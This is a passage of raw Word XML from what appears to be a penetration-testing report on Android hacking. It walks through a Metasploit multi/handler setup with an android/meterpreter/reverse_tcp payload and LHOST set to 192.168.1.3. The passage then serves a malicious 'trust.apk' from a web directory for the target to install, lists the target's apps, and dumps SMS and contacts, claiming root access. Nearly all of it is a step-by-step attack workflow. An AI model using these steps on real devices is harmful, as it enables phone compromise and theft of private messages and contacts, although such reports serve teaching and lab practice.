          <w:bCs/>
        </w:rPr>
        <w:t>chmod</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00871742">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> +x </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00871742">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>trust.apk</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00871742">
        <w:t xml:space="preserve">” in its present location and can verify by ls -l command </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25DDCE65" w14:textId="2D7ED0AF" w:rsidR="006867E4" w:rsidRPr="00871742" w:rsidRDefault="001F6024" w:rsidP="008877EA">
      <w:r w:rsidRPr="00871742">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7518A343" wp14:editId="06A3BCF8">
            <wp:extent cx="5731510" cy="1352550"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="13010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0925" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId18"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5731510" cy="1352550"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="245F449A" w14:textId="38303D5D" w:rsidR="001F6024" w:rsidRDefault="006867E4" w:rsidP="001F6024">
      <w:r w:rsidRPr="00871742">
        <w:t>Now our malware is created next we need to proceed for exploitation.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D601423" w14:textId="77777777" w:rsidR="003A298F" w:rsidRPr="00871742" w:rsidRDefault="003A298F" w:rsidP="001F6024"/>
    <w:p w14:paraId="170C89AF" w14:textId="0591D759" w:rsidR="00421A75" w:rsidRPr="00630833" w:rsidRDefault="00871742" w:rsidP="00871742">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr>
          <w:color w:val="auto"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="6" w:name="_Toc148744920"/>
      <w:r w:rsidRPr="00630833">
        <w:rPr>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:t xml:space="preserve">3.2 </w:t>
      </w:r>
      <w:r w:rsidR="008548F0" w:rsidRPr="00630833">
        <w:rPr>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:t>Android Hacking</w:t>
      </w:r>
      <w:r w:rsidR="00421A75" w:rsidRPr="00630833">
        <w:rPr>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:t xml:space="preserve"> – Exploitation</w:t>
      </w:r>
      <w:bookmarkEnd w:id="6"/>
      <w:r w:rsidR="00421A75" w:rsidRPr="00630833">
        <w:rPr>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05EB4115" w14:textId="152F56F5" w:rsidR="00577E25" w:rsidRPr="00871742" w:rsidRDefault="00421A75" w:rsidP="00421A75">
      <w:r w:rsidRPr="00871742">
        <w:t>Now to run exploit we will first have to use Metasploit Framework i.e., already preinstalled on Kali Linux</w:t>
      </w:r>
      <w:r w:rsidR="00577E25" w:rsidRPr="00871742">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1EB2F05C" w14:textId="11A37118" w:rsidR="00577E25" w:rsidRPr="00871742" w:rsidRDefault="00577E25" w:rsidP="00421A75">
      <w:r w:rsidRPr="00871742">
        <w:lastRenderedPageBreak/>
        <w:t>To run Metasploit Framework on Kali we will need to give a command on Terminal as “</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00871742">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>msfconsole</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00871742">
        <w:t xml:space="preserve">” to start </w:t>
      </w:r>
      <w:r w:rsidR="006B1831" w:rsidRPr="00871742">
        <w:t>its</w:t>
      </w:r>
      <w:r w:rsidRPr="00871742">
        <w:t xml:space="preserve"> operation.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67413703" w14:textId="757C6D2C" w:rsidR="00577E25" w:rsidRPr="00871742" w:rsidRDefault="00577E25" w:rsidP="00421A75">
      <w:r w:rsidRPr="00871742">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="417523A0" wp14:editId="138DCA01">
            <wp:extent cx="5731510" cy="3371850"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="1815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491" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId19"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5731510" cy="3371850"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BF967A2" w14:textId="458B29C7" w:rsidR="00577E25" w:rsidRPr="00871742" w:rsidRDefault="00577E25" w:rsidP="00421A75">
      <w:r w:rsidRPr="00871742">
        <w:t>“</w:t>
      </w:r>
      <w:r w:rsidRPr="00871742">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>msf6</w:t>
      </w:r>
      <w:r w:rsidR="00926C8F" w:rsidRPr="00871742">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00926C8F" w:rsidRPr="00871742">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>&gt;</w:t>
      </w:r>
      <w:r w:rsidRPr="00871742">
        <w:t>” will be shown once Metasploit is started completely.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E11FB44" w14:textId="71CEF9D4" w:rsidR="00577E25" w:rsidRPr="00871742" w:rsidRDefault="00577E25" w:rsidP="00421A75">
      <w:r w:rsidRPr="00871742">
        <w:t xml:space="preserve">  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23CE8E06" w14:textId="38761406" w:rsidR="00D54EC1" w:rsidRPr="00871742" w:rsidRDefault="00D54EC1" w:rsidP="00421A75">
      <w:r w:rsidRPr="00871742">
        <w:t xml:space="preserve">Now we will </w:t>
      </w:r>
      <w:r w:rsidR="006867E4" w:rsidRPr="00871742">
        <w:t>use exploit w.r.t to payload android/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="006867E4" w:rsidRPr="00871742">
        <w:t>meterpreter</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="006867E4" w:rsidRPr="00871742">
        <w:t>/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="006867E4" w:rsidRPr="00871742">
        <w:t>reverse_tcp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00871742">
        <w:t>, so we will use exploit</w:t>
      </w:r>
      <w:r w:rsidR="00B3643A" w:rsidRPr="00871742">
        <w:t xml:space="preserve"> exploit/multi/handler</w:t>
      </w:r>
      <w:r w:rsidRPr="00871742">
        <w:t>, to confirm it we will use the command “</w:t>
      </w:r>
      <w:r w:rsidRPr="00871742">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>use exploit/</w:t>
      </w:r>
      <w:r w:rsidR="00B3643A" w:rsidRPr="00871742">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>multi/handler</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7EC4D137" w14:textId="2AA30ABD" w:rsidR="00D54EC1" w:rsidRPr="00871742" w:rsidRDefault="00B3643A" w:rsidP="00421A75">
      <w:r w:rsidRPr="00871742">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4BDFB985" wp14:editId="60DCFA62">
            <wp:extent cx="3245017" cy="463574"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="192805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5983" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId20"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="3245017" cy="463574"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
      <w:r w:rsidR="00D54EC1" w:rsidRPr="00871742">
        <w:br w:type="textWrapping" w:clear="all"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="11E4AE53" w14:textId="4B3DA2C1" w:rsidR="007F0FAF" w:rsidRPr="00630833" w:rsidRDefault="00871742" w:rsidP="00871742">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr>
          <w:color w:val="auto"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="7" w:name="_Toc148744921"/>
      <w:r w:rsidRPr="00630833">
        <w:rPr>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:t xml:space="preserve">3.3 </w:t>
      </w:r>
      <w:r w:rsidR="007F0FAF" w:rsidRPr="00630833">
        <w:rPr>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:t>Android Hacking – Gain Access to Root</w:t>
      </w:r>
      <w:bookmarkEnd w:id="7"/>
      <w:r w:rsidR="007F0FAF" w:rsidRPr="00630833">
        <w:rPr>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11F37A18" w14:textId="4854D38A" w:rsidR="00D54EC1" w:rsidRPr="00871742" w:rsidRDefault="007F0FAF" w:rsidP="00421A75">
      <w:r w:rsidRPr="00871742">
        <w:t>W</w:t>
      </w:r>
      <w:r w:rsidR="00D54EC1" w:rsidRPr="00871742">
        <w:t>e need to check what parameters we need to set for target machine, to check that we need to run command “</w:t>
      </w:r>
      <w:r w:rsidR="00D54EC1" w:rsidRPr="00871742">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>show options</w:t>
      </w:r>
      <w:r w:rsidR="00D54EC1" w:rsidRPr="00871742">
        <w:t>”</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E35D5E0" w14:textId="0AEF0452" w:rsidR="00B3643A" w:rsidRPr="00871742" w:rsidRDefault="00B3643A" w:rsidP="00421A75">
      <w:r w:rsidRPr="00871742">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="0E856DAC" wp14:editId="2FCD1595">
            <wp:extent cx="4940554" cy="2629035"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="126730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6499" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId21"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4940554" cy="2629035"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="20F573F4" w14:textId="66A80B12" w:rsidR="00AC4344" w:rsidRPr="00871742" w:rsidRDefault="00B3643A" w:rsidP="00421A75">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00871742">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t xml:space="preserve">Here we need to set two parameters LHOST and Payload, to set them we will use command </w:t>
      </w:r>
      <w:r w:rsidRPr="00871742">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:noProof/>
        </w:rPr>
        <w:t>“set LHOST 192.168.1.3”</w:t>
      </w:r>
      <w:r w:rsidRPr="00871742">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t xml:space="preserve"> and </w:t>
      </w:r>
      <w:r w:rsidRPr="00871742">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:noProof/>
        </w:rPr>
        <w:t xml:space="preserve">“set payload android/meterpreter/reverse_tcp” </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27656B32" w14:textId="78CE11EA" w:rsidR="00B3643A" w:rsidRPr="00871742" w:rsidRDefault="00B3643A" w:rsidP="00421A75">
      <w:r w:rsidRPr="00871742">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3F750D37" wp14:editId="0888CBBA">
            <wp:extent cx="4216617" cy="514376"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="20755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2400" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId22"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4216617" cy="514376"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="3697A262" w14:textId="7F1BAAD6" w:rsidR="00AC4344" w:rsidRPr="00871742" w:rsidRDefault="00AC4344" w:rsidP="00B3643A">
      <w:r w:rsidRPr="00871742">
        <w:t xml:space="preserve">So now we have set both </w:t>
      </w:r>
      <w:r w:rsidR="00B3643A" w:rsidRPr="00871742">
        <w:t>parameters we can all parameters by command “</w:t>
      </w:r>
      <w:r w:rsidR="00B3643A" w:rsidRPr="00871742">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>show options</w:t>
      </w:r>
      <w:r w:rsidR="00B3643A" w:rsidRPr="00871742">
        <w:t>”</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B494A82" w14:textId="1083D643" w:rsidR="00B3643A" w:rsidRPr="00871742" w:rsidRDefault="00B3643A" w:rsidP="00B3643A">
      <w:r w:rsidRPr="00871742">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="2CBF70E1" wp14:editId="2AAF0DA7">
            <wp:extent cx="5731510" cy="2413000"/>
            <wp:effectExtent l="0" t="0" r="2540" b="6350"/>
            <wp:docPr id="155814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47588" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId23"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5731510" cy="2413000"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="65F69E42" w14:textId="25C533C2" w:rsidR="00AC4344" w:rsidRPr="00871742" w:rsidRDefault="00B3643A" w:rsidP="00421A75">
      <w:r w:rsidRPr="00871742">
        <w:t xml:space="preserve">Now last thing we have set before attack and that is to move </w:t>
      </w:r>
      <w:r w:rsidR="00963FC0" w:rsidRPr="00871742">
        <w:t>final .</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00963FC0" w:rsidRPr="00871742">
        <w:t>apk</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00963FC0" w:rsidRPr="00871742">
        <w:t xml:space="preserve"> file to /var/www/html/downloads/ directory </w:t>
      </w:r>
      <w:r w:rsidR="00AC4344" w:rsidRPr="00871742">
        <w:br w:type="textWrapping" w:clear="all"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F077B3A" w14:textId="77777777" w:rsidR="001F6024" w:rsidRPr="00871742" w:rsidRDefault="00963FC0" w:rsidP="00421A75">
      <w:r w:rsidRPr="00871742">
        <w:t xml:space="preserve">Now everything is perfect and we are ready to </w:t>
      </w:r>
      <w:r w:rsidR="001161BE" w:rsidRPr="00871742">
        <w:t>attack and gain access so we are moving further now,</w:t>
      </w:r>
      <w:r w:rsidR="001F6024" w:rsidRPr="00871742">
        <w:t xml:space="preserve"> Let’s move to Gain access.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D1C0771" w14:textId="1AD9AC26" w:rsidR="000D37AA" w:rsidRPr="00871742" w:rsidRDefault="00AC4344" w:rsidP="00421A75">
      <w:r w:rsidRPr="00871742">
        <w:t xml:space="preserve">We are in the final step of penetration testing i.e., gaining access, in previous step we have prepared all the parameters that were required to run exploit successfully. Now next is to run exploit, hence use command </w:t>
      </w:r>
      <w:r w:rsidR="000D37AA" w:rsidRPr="00871742">
        <w:t>“</w:t>
      </w:r>
      <w:r w:rsidRPr="00871742">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>exploit</w:t>
      </w:r>
      <w:r w:rsidR="000D37AA" w:rsidRPr="00871742">
        <w:t>”</w:t>
      </w:r>
      <w:r w:rsidRPr="00871742">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15F4722F" w14:textId="7EA8C35B" w:rsidR="001F6024" w:rsidRPr="00871742" w:rsidRDefault="001F6024" w:rsidP="00421A75">
      <w:r w:rsidRPr="00871742">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="2B5B6D9A" wp14:editId="529234ED">
            <wp:extent cx="5731510" cy="542925"/>
            <wp:effectExtent l="0" t="0" r="2540" b="9525"/>
            <wp:docPr id="137594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5128" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId24"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5731510" cy="542925"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E75DB8A" w14:textId="60F0E929" w:rsidR="001F6024" w:rsidRPr="00871742" w:rsidRDefault="001F6024" w:rsidP="001F6024">
      <w:r w:rsidRPr="00871742">
        <w:t xml:space="preserve">Let’s open the browser of Target device (Smartphone) and </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A7400DF" w14:textId="77777777" w:rsidR="001F6024" w:rsidRPr="00871742" w:rsidRDefault="001F6024" w:rsidP="001F6024">
      <w:r w:rsidRPr="00871742">
        <w:t xml:space="preserve">Enter in </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00871742">
        <w:t>url</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00871742">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:hyperlink r:id="rId25" w:history="1">
        <w:r w:rsidRPr="00871742">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>http://192.168.1.3/downloads/</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00871742">
        <w:t xml:space="preserve"> and after this a page will open </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F522648" w14:textId="77777777" w:rsidR="001F6024" w:rsidRPr="00871742" w:rsidRDefault="001F6024" w:rsidP="001F6024">
      <w:r w:rsidRPr="00871742">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="2A472900" wp14:editId="4E36BBBE">
            <wp:extent cx="5968819" cy="6667500"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="190104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46730" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId26"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5974396" cy="6673730"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D9365A2" w14:textId="268EF728" w:rsidR="001F6024" w:rsidRPr="00871742" w:rsidRDefault="001F6024" w:rsidP="001F6024">
      <w:r w:rsidRPr="00871742">
        <w:t xml:space="preserve">Now if the Target clicks on </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00871742">
        <w:t>trust.apk</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00871742">
        <w:t xml:space="preserve"> a malicious code will be downloaded and he/she opens it the system will ask for installation, if Target install </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00871742">
        <w:t>trust.apk</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00871742">
        <w:t xml:space="preserve"> in the system it will give root access to the attacker.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="541AFC20" w14:textId="2E95B019" w:rsidR="001F6024" w:rsidRPr="00871742" w:rsidRDefault="001F6024" w:rsidP="001F6024">
      <w:r w:rsidRPr="00871742">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3F918639" wp14:editId="6CFD27E3">
            <wp:extent cx="5731510" cy="614045"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="9398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6877" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId27"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5731510" cy="614045"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FACF488" w14:textId="402CBEE0" w:rsidR="001F6024" w:rsidRPr="00871742" w:rsidRDefault="001F6024" w:rsidP="00421A75">
      <w:r w:rsidRPr="00871742">
        <w:t xml:space="preserve">To verify </w:t>
      </w:r>
      <w:r w:rsidR="0089058F" w:rsidRPr="00871742">
        <w:t>access,</w:t>
      </w:r>
      <w:r w:rsidRPr="00871742">
        <w:t xml:space="preserve"> we used some commands like </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00871742">
        <w:t>app_list</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="5E5E167A" w14:textId="39F6BDB1" w:rsidR="001F6024" w:rsidRPr="00871742" w:rsidRDefault="001F6024" w:rsidP="00421A75">
      <w:r w:rsidRPr="00871742">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5C694C74" wp14:editId="4A768B4E">
            <wp:extent cx="5731510" cy="3752850"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="20380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1658" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId28"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5731510" cy="3752850"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="36379531" w14:textId="6F98C6AA" w:rsidR="001F6024" w:rsidRPr="00871742" w:rsidRDefault="001F6024" w:rsidP="00421A75">
      <w:r w:rsidRPr="00871742">
        <w:t xml:space="preserve">We also dumped </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00871742">
        <w:t>sms</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00871742">
        <w:t xml:space="preserve"> and contact data from Target device</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5190B6B2" w14:textId="3ADFEE79" w:rsidR="001F6024" w:rsidRPr="00871742" w:rsidRDefault="001F6024" w:rsidP="00421A75">
      <w:r w:rsidRPr="00871742">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3BCC6B47" wp14:editId="002C187B">
            <wp:extent cx="5731510" cy="2654300"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="11978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4122" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId29"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5731510" cy="2654300"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A2E97BA" w14:textId="60464FAF" w:rsidR="001F6024" w:rsidRPr="00871742" w:rsidRDefault="001F6024" w:rsidP="00421A75">
      <w:r w:rsidRPr="00871742">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="046BD1A8" wp14:editId="1692FBD7">
            <wp:extent cx="5731510" cy="2419350"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="15627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185" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId30"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5731510" cy="2419350"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="209D25E4" w14:textId="2B229BD4" w:rsidR="000D37AA" w:rsidRPr="00871742" w:rsidRDefault="000D37AA" w:rsidP="00421A75">
      <w:r w:rsidRPr="00871742">
        <w:t xml:space="preserve">Hence, we are able to obtain </w:t>
      </w:r>
      <w:r w:rsidRPr="00871742">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">root access </w:t>
      </w:r>
      <w:r w:rsidRPr="00871742">
        <w:t>of the Target Machine</w:t>
      </w:r>
      <w:r w:rsidR="001F6024" w:rsidRPr="00871742">
        <w:t>.</w:t>
      </w:r>
    </w:p>
